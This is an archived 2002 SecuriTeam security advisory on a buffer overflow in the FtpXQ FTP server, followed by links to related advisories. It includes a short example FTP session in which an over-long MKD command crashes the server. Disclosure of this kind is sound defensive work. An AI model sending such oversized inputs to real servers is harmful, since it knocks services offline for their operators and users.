[NT] FtpXQ MKD Buffer Overflow

From: support@securiteam.com
Date: 05/28/02

From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 28 May 2002 08:02:57 +0200 (CEST)

- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  FtpXQ MKD Buffer Overflow

SUMMARY

 <http://www.datawizard.net/Support/FtpXQ/ftpxq.htm> FtpXQ is an FTP
Server built using the WinsockQ from DataWizard Technologies. A security
vulnerability in the product allows remote attackers to overflow an
internal buffer by providing an overly long "make directory" request.

DETAILS

Vulnerable systems:
 * FtpXQ Server version 2.0.98 and above

Example:
% ftp localhost
Connected to xxxxxxxxx.rh.rit.edu.
220 DataWizard Technologies' FtpXQ FTP Server. (Version 2.0.98).
User (xxxxxxxxx.rh.rit.edu:(none)): test
331 OK need password.
Password:
230 Welcome to DataWizard Technologies' FtpXQ FTP Server.
ftp> MKD AAAAAAAAAAAAA.....AAAA

(longer than 254 chars crashes the server)

ADDITIONAL INFORMATION

The information has been provided by <mailto:snakebyte@gmx.de> SnakeByte
/ Eric Sesterhenn.

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [NEWS] SalesCart Database Storage Insecurity
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... struct sockaddr_in sin; ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [TOOL] OS SIM - Security Infrastructure Monitor
    ... Get your security news from a reliable source. ... Infrastructure Monitor) able to integrate, ... level and low level security and network events which is able to compete ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NEWS] Cisco Security Agent DoS Vulnerability
    ... Get your security news from a reliable source. ... A malicious attacker may be able to send a crafted IP packet to a Windows ... * Cisco CSA maintenance version 4.5.1.616 ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NT] BadBlue XSS/Information Disclosure Vulnerabilities
    ... Beyond Security would like to welcome Tiscali World Online ... Cross-Site Scripting in ext.dll Search Page -- Again ... Matthew has discovered another flaw in BadBlue's search engine allowing ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] Remote Memory Reading Through TCP/ICMP
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A security vulnerability in Linux allows remote attackers to cause the ... remote OS to return chucks of "userland" memory. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)